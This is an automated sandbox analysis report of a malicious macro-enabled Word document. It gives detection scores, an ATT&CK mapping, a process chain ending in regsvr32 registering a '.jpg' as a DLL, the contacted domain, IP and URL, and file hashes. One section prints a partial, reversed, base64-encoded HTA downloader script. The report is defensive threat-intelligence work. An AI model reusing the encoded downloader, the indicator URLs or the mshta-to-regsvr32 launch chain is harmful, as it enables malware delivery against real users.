ID: 401458
Sample Name: 25aabd25_by_Libranalysis.docm
Cookbook: defaultwindowsofficecookbook.jbs
Time: 17:06:17
Date: 30/04/2021
Version: 32.0.0 Black Diamond

Copyright Joe Security LLC 2021

Analysis Report 25aabd25_by_Libranalysis.docm

Overview

General Information

Sample Name: 25aabd25_by_Libranalysis.docm
Analysis ID: 401458
MD5: 25aabd2540a1f7b…
SHA1: 85f6b809a81a361…
SHA256: efb29655c57e8dc…

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Classification

[Classification chart; verdict scale: malicious / suspicious / clean. Categories shown: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware]

Most interesting Screenshot: [image]

Signatures

Overview list; entries that are truncated in the source are left truncated.

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Contains capabilities to detect virtu…
Creates a process in suspended mo…
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains embedded VBA…
Document contains no OLE stream…
Document has an unknown applicati…
Monitors certain registry keys / valu…
Potential document exploit detected…
Queries the volume information (na…
Searches for the Microsoft Outlook f…
Tries to load missing DLLs
Uses a known web browser user age…
Uses code obfuscation techniques (…

Startup

System is w10x64
WINWORD.EXE (PID: 6116 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  explorer.exe (PID: 6048 cmdline: explorer c:\users\public\valuePasteList.hta MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
explorer.exe (PID: 5316 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  mshta.exe (PID: 4804 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\valuePasteList.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
    regsvr32.exe (PID: 4864 cmdline: 'C:\Windows\System32\regsvr32.exe' c:\users\public\valuePasteList.jpg MD5: 426E7499F6A7346F0410DEAD0805586B)
cleanup


Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Register DLL with spoofed extension

Signature Overview

• AV Detection
• Compliance
• Software Vulnerabilities
• Networking
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• HIPS / PFW / Protection Evasion
• Language, Device and Operating System Detection


AV Detection:

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document contains an embedded VBA macro with suspicious strings

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Mitre Att&ck Matrix

The matrix is reconstructed here one tactic per line; the numbers after a technique are the signature counts shown in the matrix cell. Techniques without a number are the matrix's standard placeholders.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Scripting 2 2; Exploitation for Client Execution 1 3; At (); At (Windows); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection 1 2; DLL Side-Loading 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading 1; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 1; Process Injection 1 2; Scripting 2 2; Obfuscated Files or Information 1 1; DLL Side-Loading 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Query Registry 1; Security Software Discovery 1 1; Virtualization/Sandbox Evasion 1; Process Discovery 1; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 1 3
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Email Collection 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Ingress Tool Transfer 1; Non-Application Layer Protocol; Application Layer Protocol 1 2; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points

Behavior Graph

[Behavior graph figure; only the legend and node labels are recoverable]
ID: 401458
Sample: 25aabd25_by_Libranalysis.docm
Startdate: 30/04/2021
Architecture: WINDOWS
Score: 80
Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet
Signatures shown: Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); Multi AV Scanner detection for submitted file; Sigma detected: Register DLL with spoofed extension; 4 other signatures
Process nodes: WINWORD.EXE started explorer.exe (PID 6048); explorer.exe (PID 5316) started mshta.exe; mshta.exe started regsvr32.exe
Dropped files: C:\...\25aabd25_by_Libranalysis.docm.LNK (MS); C:\Users\Public\valuePasteList.hta (HTML)
Network nodes: hesterhumora.com (unknown); 193.203.203.235, 49718, 80, SEAP-AGEES, Russian Federation; 192.168.2.1 (unknown)

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
25aabd25_by_Libranalysis.docm | 13% | ReversingLabs | Script-Macro.Packed.Generic
25aabd25_by_Libranalysis.docm | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
hesterhumora.com | 193.203.203.235 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
hesterhumora.com/dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6?vc=4eyoNNPxt2YQPjsp3&OUMP=Aa93N&user=MYqjfAOnpCOmZrUkdR | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries


Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
193.203.203.235 | hesterhumora.com | Russian Federation | 200521 | SEAP-AGEES | false

Private

IP: 192.168.2.1

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 401458
Start date: 30.04.2021
Start time: 17:06:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 5s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 25aabd25_by_Libranalysis.docm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled; EGA enabled; HDC enabled; GSI enabled (VBA); AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.expl.evad.winDOCM@8/12@1/2
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .docm; Found Word or Excel or PowerPoint or XPS Viewer; Attach to Office via COM; Scroll down; Close Viewer
Warnings:
Excluded IPs from analysis (whitelisted):
Excluded domains from analysis (whitelisted):
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
193.203.203.235 | 25aabd25_by_Libranalysis.docm | Get hash | malicious | Browse | hesterhumora.com/dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6?vc=4eyoNNPxt2YQPjsp3&OUMP=Aa93N&user=MYqjfAOnpCOmZrUkdR

Domains

No context

ASN

Match: SEAP-AGEES

Associated Sample Name / URL | SHA 256 | Detection | Link | Context
25aabd25_by_Libranalysis.docm | Get hash | malicious | Browse | 193.203.203.235
dettare-04.22.2021.doc | Get hash | malicious | Browse | 193.203.203.64
dettare-04.22.2021.doc | Get hash | malicious | Browse | 193.203.203.64
Overdue-486523561-04212021.xlsm | Get hash | malicious | Browse | 193.203.202.55
Overdue-894289303-04212021.xlsm | Get hash | malicious | Browse | 193.203.202.55
Overdue-486523561-04212021.xlsm | Get hash | malicious | Browse | 193.203.202.55
Overdue-894289303-04212021.xlsm | Get hash | malicious | Browse | 193.203.202.55
Overdue-486523561-04212021.xlsm | Get hash | malicious | Browse | 193.203.202.55
Overdue-894289303-04212021.xlsm | Get hash | malicious | Browse | 193.203.202.55
der vorschlag.doc | Get hash | malicious | Browse | 193.203.203.33
der vorschlag.doc | Get hash | malicious | Browse | 193.203.203.33
der vorschlag.doc | Get hash | malicious | Browse | 193.203.203.33
Eg9OT4rRLF.exe | Get hash | malicious | Browse | 193.203.203.138
documento-03.26.2021_9657652.doc | Get hash | malicious | Browse | 193.203.203.245
documento-03.26.2021_9657652.doc | Get hash | malicious | Browse | 193.203.203.245
raccontare-03.21_65537264.doc | Get hash | malicious | Browse | 193.203.203.16
raccontare-03.21_65537264.doc | Get hash | malicious | Browse | 193.203.203.16
documento-03.26.2021_9657652.doc | Get hash | malicious | Browse | 193.203.203.245
dettagli.03.16.2021.doc | Get hash | malicious | Browse | 193.203.203.17
dettagli.03.16.2021.doc | Get hash | malicious | Browse | 193.203.203.17

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\Public\valuePasteList.hta

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 2884
Entropy (8bit): 5.8589412056450065
Encrypted: false
SSDEEP: 48:77gi2hswudGQvzwHKM/G1kC3GkQTR0ZUIIMvWicEXYmCVCoqogFxvRm:77gi2hswudGUwqYgD3cCUIIMvHHXYmc/
MD5: 4AE917E70279FC83CEB95DEF066CD872
SHA1: 1384378C5F59C873063F8FD22FAB6B22B7853034
SHA-256: 1417ABB6FA24644BAD48C77B5A4584C48534967C7355245FCA50E08B9B66AAFF
SHA-512: 4911F676D0AB2A9D52B6175EC591DA043D89CCB971F1CD697452331DBCE93A4D3D8FA004D5277A9814A5203C8E30F75AD3F0A4D0EEA434D8CB39563AD93B963B
Malicious: true
Reputation: low
Preview:

fTtlc29sYy50bmVtdWdyQWVzYWJhdGFEdHhlbjspMiAsImdwai50c2lMZXRzYVBldWxhdlxcY2lsYnVwXFxzcmVzdVxcOmMiKGVs aWZvdGV2YXMudG5lbXVnckFlc2FiYXRhRHR4ZW47KXlkb2Jlc25vcHNlci5iVnlyZXVRcmFlbGMoZXRpcncudG5lbXVnckFlc2FiYXRhRHR4ZW47MSA9IGVweXQudG5lbX VnckFlc2FiYXRhRHR4ZW47bmVwby50bmVtdWdyQWVzYWJhdGFEdHhlbjspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB0bmVtdWdyQWVzYW JhdGFEdHhlbiByYXZ7KTAwMiA9PSBzdXRhdHMuYlZ5cmV1UXJhZWxjKGZpOykoZG5lcy5iVnlyZXVRcmFlbGM7KWVzbGFmICwiUmRrVXJabU9DcG5PQWZqcV lNPXJlc3UmTjM5YUE9UE1VTyYzcHNqUFFZMnR4UE5Ob3llND1jdj82d2FsLzY3MDcyLzI1MjE1L0dUNWtvTVFUeXdIMVFwNEpvZFJ6U2RzeXJjTWVLc2UvMj M2NTcvc29zZ2QvbW9jLmFyb211aHJldHNlaC8vOnB0dGgiICwiVEVHIihuZXBvLmJWeXJldVFyYWVsYzspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9 IGJWeXJldVFyYWVsYyByYXY=|fXspcmV0bmlvUG9wZVJ5cm9tZW0oaGN0YWN9OykiYXRoLnRzaUxldHNhUGV1bGF2XFxjaWxidXBcXHNyZXN1XFw6YyIoZWx pZmV0ZWxlZC5ub2l0cGVjeEV5YXJyYXt5cnQ7KSJ0Y2VqYm9tZXRzeXNlbGlmLmduaXRwaXJjcyIodGNlamJPWGV2aXRjQSB3ZW4gPSBub2l0cGVjeEV5YXJ yYSByYXY7K

C:\Users\Public\valuePasteList.jpg

Process: C:\Windows\SysWOW64\mshta.exe
File Type: HTML document, ASCII text
Category: dropped
Size (bytes): 203
Entropy (8bit): 5.1361237488648435
Encrypted: false
SSDEEP: 6:pn0+Dy9xwGObRmEr6VnetdzRx3FXGKCezocKqD:J0+oxBeRmR9etdzRxOez1T
MD5: E3860343F8E372A656101CF4E93A7005
SHA1: A5DD413F449E60041A26AB3DD325972291851ACD
SHA-256: 2A90E466330DF94118A6F812FC94E334BEC6DA035FE11936F0EA744616632522
SHA-512: CD460C8315061E5D0F91062A20E51EEC90683168B02EC52B22E5743A0461D4E47898D66CAD09E2FD0ED9D60DA3A53B3CA5B4C906F7EEAB5959B2366AB2BD8334
Malicious: false
Reputation: low
Preview: ..404 Not Found..

Not Found

.

The requested URL "la w6" was not found on this server.

..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\51FE3752-6560-4F0C-ADCF-098B9028BD48

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 134558
Entropy (8bit): 5.36840385534488
Encrypted: false
SSDEEP: 1536:HcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:sEQ9DQW+zPXO8
MD5: 40817FEB2EBBD8220D604C87586D7FCF
SHA1: 46E3010EBCBBD3DA3DD9467BF62349E6339E169E
SHA-256: 3C1F4DA023ED8E66F0096F7846FB2F856D14B2E3194212E0BA854D1253A2DFF0
SHA-512: AE2A9B48AFC67CF3849AD7EDEED41535F6B4776044C7C3E2D68698E6A6E29E664C6FB4A9BEB2BCC76E3F13DE4E1697E8200C5BF393D1DACA2AE1AC7533164D0B
Malicious: false
Reputation: low
Preview: .... .. Build: 16.0.14028.30527-->.. .. .. .. .. https://rr.office.microsoft.com/research/query.asmx.. .. .. https://o15.officeredir.microsoft.com/r.. .. .. https://o15.officeredir.microsoft.com/r.. .. .. https://[MAX.BaseHost]/client/results.. .. .. https://[MAX.BaseHost]/client/results.. .. .. https://ocsa.office.microsoft.com/client/15/help/template.. ..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DD65E6CC.gif

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: GIF image data, version 89a, 1082 x 217
Category: dropped
Size (bytes): 55598
Entropy (8bit): 7.895939785737012
Encrypted: false
SSDEEP: 1536:fxDjV+l0rM81NCGCPisEHOAq4eyO6i1itW7YUvOMkksCLK:JnnrxRCPdYZuyL3t5UmMkkk
MD5: 5F853B52C1FA08003536A552542F5BAA
SHA1: 476781A3E1DA98354B835ACE6079146F0BBB391E
SHA-256: 1186DC7E0AE0CFA11BBD14277048028C97F96EF30DAB4D26958B09D540C8C708
SHA-512: AD729D4E9D4F5E9F0E07A808103FEEEE8671A73CA2C3F13706EE33C34679717542CFB759E680CADEFF60CD61933203599353FB56E4163CD370DB8B018BB52B5B
Malicious: false
Preview: GIF89a:...... 4. 4..4...... [email protected]..<.&=.0L.....4..4..<..*h...... D..C..<..<..L..1t.<.-\.%}..M.7.\9c..]...p..K...v...... k..../..}..^]....#K.L....3k6:S&.x

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{0076817D-35EC-4844-8605-85E02B075446}.tmp

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 0.1903644670878318
Encrypted: false
SSDEEP: 3:/lMlt4slllFlNtO0L:+lrWU
MD5: 96F49CDC0E837296C17EC20F53742D64
SHA1: A6781C5043149A7612E3812646409D2FA58E008C
SHA-256: CD7950A71BDE874B4644682F2C0DEBAF0ED9FCDC88E09B1CEB6E3BF9DB670485
SHA-512: 0ED7A89D92F9B4661DA13F5551E1D5698F4C829A1AAB988E0A3F50C16198A058F77E0ED2C8E6148B585680C82755F481B2EDCF53302D8048A44F08F8E709F144
Malicious: false
Preview: ......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{883A0CD4-68F7-4E0B-B3FD-D65D55DCC0D9}.tmp

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Preview: ......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\law6[1].htm

Process: C:\Windows\SysWOW64\mshta.exe
File Type: HTML document, ASCII text
Category: downloaded
Size (bytes): 203
Entropy (8bit): 5.1361237488648435
Encrypted: false
SSDEEP: 6:pn0+Dy9xwGObRmEr6VnetdzRx3FXGKCezocKqD:J0+oxBeRmR9etdzRxOez1T
MD5: E3860343F8E372A656101CF4E93A7005
SHA1: A5DD413F449E60041A26AB3DD325972291851ACD
SHA-256: 2A90E466330DF94118A6F812FC94E334BEC6DA035FE11936F0EA744616632522
SHA-512: CD460C8315061E5D0F91062A20E51EEC90683168B02EC52B22E5743A0461D4E47898D66CAD09E2FD0ED9D60DA3A53B3CA5B4C906F7EEAB5959B2366AB2BD8334
Malicious: false
IE Cache URL: hesterhumora.com/dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6?vc=4eyoNNPxt2YQPjsp3&OUMP=Aa93N&user=MYqjfAOnpCOmZrUkdR
Preview: ..404 Not Found..

Not Found

.

The requested URL "la w6" was not found on this server.

..

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 170164
Entropy (8bit): 4.369761139622616
Encrypted: false
SSDEEP: 3072:f0g64og8WpFpKKHHedydFeo+oQLUlPoK0:f0g/oB0FpTHHIydFeo+oIUlPoK0
MD5: D4C0E04DCA7925799B92026FD919B8B7
SHA1: 56FC7BB23154498F9584342566A1AA8ED8C42366
SHA-256: FDFF1CC93BF0F2A53B9EE6FB0C5CAF4908169CE9D1177ADB52DA733C118972E5
SHA-512: DB64606E8920D444D6D1454081D24D0079617664DD243DA81FC42DF61A11896E18992B4E4D9B9B6A83622FE44DF64296553A97FBCB6E7CA47C248413CB58E1F9
Malicious: false
Preview: MSFT...... Q...... $...... $...... d...... ,...... X...... L...... x...... @...... l...... 4...... `...... (...... T...... H...... t...... <...... h...... 0...... \...... $...... P...... |...... D...... p...... 8...... d...... ,...... X...... L...... x...... @...... l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&.. .&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-...... |...... D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. [email protected]:...:...:..`;...;.. (<...<...<..T=...=...>...>...>[email protected]@...@..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\25aabd25_by_Libranalysis.docm.LNK

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:44 2020, mtime=Fri Apr 30 23:07:34 2021, atime=Fri Apr 30 23:07:30 2021, length=82318, window=hide
Category: dropped
Size (bytes): 2260
Entropy (8bit): 4.709201042110935
Encrypted: false
SSDEEP: 48:8pYkuQOENTkNvOEC1B6ppYkuQOENTkNvOEC1B6:8nuQFqNvFC1KnuQFqNvFC1
MD5: 38CF5911111FC2CB02A2461F5AA3015A
SHA1: 5D257832144B07C5D50411DFAF14F46BD9BD8A1A
SHA-256: 907BFDE83BB91D68A94EBC24BCBB54F449CDE55B02FBDFDEE287CF28FD53B8B3
SHA-512: 641EBCC72987BC5CC363D4ACACD5FFC1F23D32AE4C8740808AB97EB73047473633054D799CA681B905A50A347EF5AA3CCCF1E5B3821BB45138C3D6797C42C796
Malicious: true
Preview: L...... F...... f.:.....o..>..Su...>...A...... P.O. .:i.....+00.../C:\...... x.1...... N....Users.d...... L...R...... :.....q|[email protected].,.- .2.1.8.1.3.....P.1.....>Qxx..user.<...... Ny..R...... S...... h.a.r.d.z.....~.1.....>Qyx..Desktop.h...... Ny..R...... Y...... >.....'[email protected].,.-.2 .1.7.6.9...... 2..A...R.. .25AABD~1.DOC..l...... >Qwx.R...... h...... 2.5.a.a.b.d.2.5._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...d.o.c.m...... c...... -...... b...... >.S...... C:\Use rs\user\Desktop\25aabd25_by_Libranalysis.docm..4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.5.a.a.b.d.2.5._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...d.o.c.m...... :..,.LB.)...As...`...... X...... 980108...... !a..%.H.VZAj...... -...... -..!a..%.H.VZAj...... -...... -...... 1SPS.XF.L8C....&.m.q...... /...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 127
Entropy (8bit): 4.495810970496746
Encrypted: false
SSDEEP: 3:Hh1G6uHUwSLMBKdrSZEHG6uHUwSLMBKdrSmxWh1G6uHUwSLMBKdrSv:Hhbu0NLdRNu0NLdCbu0NLdI
MD5: 4D93A7A2FED78E0699FDE5F631B4A425
SHA1: E9336D9F32A018289ADB2D05C7EE51F16348B5B3
SHA-256: D2F91C4488D06A4180449C33655B997A53C81B78CC0F3A45F858DB4D4385F195
SHA-512: E48B9429B807A4EAB4CD2BCD4484CEBCFC95CA712F4CA00E73E9FCEF12E2F5B8C6FB34C13BCEF194DAB1D0B7769868A95D6AA032D226F58928EFC9EAA6B2BC27
Malicious: false
Preview: [misc]..25aabd25_by_Libranalysis.docm.LNK=0..25aabd25_by_Libranalysis.docm.LNK=0..[misc]..25aabd25_by_Libranalysis.docm.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5669409255645634
Encrypted: false
SSDEEP: 3:Rl/ZdgkhGhRElpztl9lqKJsRXoln:RtZRAkldtISs6n
MD5: B7F99051D48E6CAF22563D3CA7C97861
SHA1: 409D1D944CBA2D89DF888F07C6DE5E5D3B0C54A9
SHA-256: FA2EF7237F946D92212B9130843CE2B41F9F50ED225E79D5DD437CAD898D2F5D
SHA-512: C36CE7BB05424F82327CEB89924CDDF938EFB3DE66E189AD43B2A5756FC0DF0F2B923BF9CB903E41FD6BFC710D0DE1FD1E49F49670CDB9CB33E2359DD346D9A2
Malicious: false
Preview: .pratesh...... p.r.a.t.e.s.h...... x..t`..tP..t...... $...... 6C......

C:\Users\user\Desktop\~$aabd25_by_Libranalysis.docm

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5669409255645634
Encrypted: false
SSDEEP: 3:Rl/ZdgkhGhRElpztl9lqKJsRXoln:RtZRAkldtISs6n
MD5: B7F99051D48E6CAF22563D3CA7C97861
SHA1: 409D1D944CBA2D89DF888F07C6DE5E5D3B0C54A9
SHA-256: FA2EF7237F946D92212B9130843CE2B41F9F50ED225E79D5DD437CAD898D2F5D
SHA-512: C36CE7BB05424F82327CEB89924CDDF938EFB3DE66E189AD43B2A5756FC0DF0F2B923BF9CB903E41FD6BFC710D0DE1FD1E49F49670CDB9CB33E2359DD346D9A2
Malicious: false
Preview: .pratesh...... p.r.a.t.e.s.h...... x..t`..tP..t...... $...... 6C......

Static File Info

General
File type: Microsoft Word 2007+
Entropy (8bit): 7.865778964362989
TrID: Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%; Word Microsoft Office Open XML Format document (49504/1) 32.35%; Word Microsoft Office Open XML Format document (43504/1) 28.43%; ZIP compressed archive (8000/1) 5.23%
File name: 25aabd25_by_Libranalysis.docm
File size: 82318
MD5: 25aabd2540a1f7bf337436939eff50d3
SHA1: 85f6b809a81a361d45a952e7eb95f128f858397d
SHA256: efb29655c57e8dc84defbc6bba89feb9a8bf3ca75ada4929c338de7404a5df08
SHA512: 94173a37103966bdb91830dcd7100eebe2f5bc169dbfa76f2a91e67f94fe04151787c3ca3916cdc409c60403f2cb28402321d205a658defc026d9f8028ac5793
SSDEEP: 1536:Kwt18fPeGe94wxhxDjV+l0rM81NCGCPisEHOAq4eyO6i1itW7YUvOMkksCLYA09n:KI183eGe94wxfnnrxRCPdYZuyL3t5Umr
File Content Preview: PK...... !....h....c...... [Content_Types].xml ...(......

File Icon

Icon Hash: 74fcd0d2f692908c

Static OLE Info

General
Document Type: OpenXML
Number of OLE Files: 1

OLE File "/opt/package/joesandbox/database/analysis/401458/sample/25aabd25_by_Libranalysis.docm"

Indicators
Has Summary Info: False
Application Name: unknown
Encrypted Document: False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary
Title: ath.tsiLetsaPeulav\cilbup\sresu\:c rerolpxe
Subject:
Author: tcdjlmp
Keywords:
Template: Normal
Last Saved By: Пользователь Windows
Revision Number: 2
Total Edit Time: 0
Create Time: 2021-04-30T07:30:00Z
Last Saved Time: 2021-04-30T07:30:00Z
Number of Pages: 1
Number of Words: 0
Number of Characters: 0
Creating Application: Microsoft Office Word
Security: 4

Document Summary
Number of Lines: 2
Number of Paragraphs: 0
Thumbnail Scaling Desired: false
Company:
Contains Dirty Links: false
Shared Document: false
Changed Hyperlinks: false
Application Version: 16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1307

General
Stream Path: VBA/ThisDocument
VBA File Name: ThisDocument.cls
Stream Size: 1307
Data ASCII: ...... X ...... p . . . . . < . . T $ V . D . . J Q . . - . . . . e . e A @ . . 2 ...... C . H . e x . f . . q ...... x ...... C . H . e x . f . . q < . . T $ V . D . . J Q . . - ...... M E ......
Data Raw: 01 16 03 00 06 00 01 00 00 8c 03 00 00 e4 00 00 00 ea 01 00 00 ba 03 00 00 c8 03 00 00 58 04 00 00 01 00 00 00 01 00 00 00 a3 2e d1 f0 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 3c bc 0d 54 24 56 c2 44 ad c8 4a 51 fe 1a 2d 97 a2 86 da 65 df 65 41 40 ad cb 32 05 e8 8c 95 b8 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword False VB_Exposed Attribute VB_Creatable VB_Name Document_Open() VB_PredeclaredId VB_GlobalNameSpace VB_Base VB_Customizable VB_TemplateDerived "ThisDocument"

VBA Code

VBA File Name: arrayCopy.cls, Stream Size: 1490

General
Stream Path: VBA/arrayCopy
VBA File Name: arrayCopy.cls
Stream Size: 1490
Data ASCII: ...... u ...... x ...... M E ......
